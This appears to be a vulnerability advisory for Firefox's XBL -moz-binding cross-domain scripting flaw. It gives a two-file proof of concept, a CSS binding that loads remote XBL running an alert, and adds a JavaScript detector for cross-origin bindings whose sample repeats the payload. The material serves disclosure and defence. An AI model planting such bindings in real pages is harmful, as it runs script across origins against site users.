Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability
The following proof of concept examples are available:

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
  <binding id="xss">
    <implementation>
      <constructor>
        alert("XBL XSS");
      </constructor>
    </implementation>
  </binding>
</bindings>

https://bugzilla.mozilla.org/attachment.cgi?id=209241
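As an added example (not part of the original advisory), the following JavaScript scans markup or CSS for -moz-binding declarations and reports those whose XBL URL resolves to a different origin than the page, which is the pattern the proof of concept above uses. The function name findCrossOriginBindings and the sample input are constructed for illustration.

```javascript
// Added example: flag -moz-binding declarations that load XBL from another origin.
// findCrossOriginBindings and SAMPLE_PAGE are constructed for illustration.

// Matches "-moz-binding: url(...)" with optional single or double quotes.
const BINDING_RE = /-moz-binding\s*:\s*url\(\s*(['"]?)([^'")]*)\1\s*\)/gi;

function findCrossOriginBindings(text, pageUrl) {
  const page = new URL(pageUrl);
  const findings = [];
  for (const m of text.matchAll(BINDING_RE)) {
    const raw = m[2].trim();
    let target;
    try {
      target = new URL(raw, page); // relative URLs resolve against the page
    } catch (e) {
      findings.push({ raw, reason: 'unparseable URL' });
      continue;
    }
    if (target.origin !== page.origin) {
      findings.push({
        raw,
        reason: 'cross-origin',
        origin: target.origin,
        bindingId: target.hash.slice(1), // fragment selects the <binding id>
      });
    }
  }
  return findings;
}

// Constructed sample: one same-origin binding and one cross-origin binding.
const SAMPLE_PAGE = `
<style>
  div.menu { -moz-binding: url(widgets.xml#menu); }
  body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>`;

for (const f of findCrossOriginBindings(SAMPLE_PAGE, 'http://domain1/path/to/page.html')) {
  console.log(`${f.reason}: ${f.raw}`);
}
```

This is a text scan rather than a CSS parser, so it suits triage of stored or user-supplied markup, not enforcement.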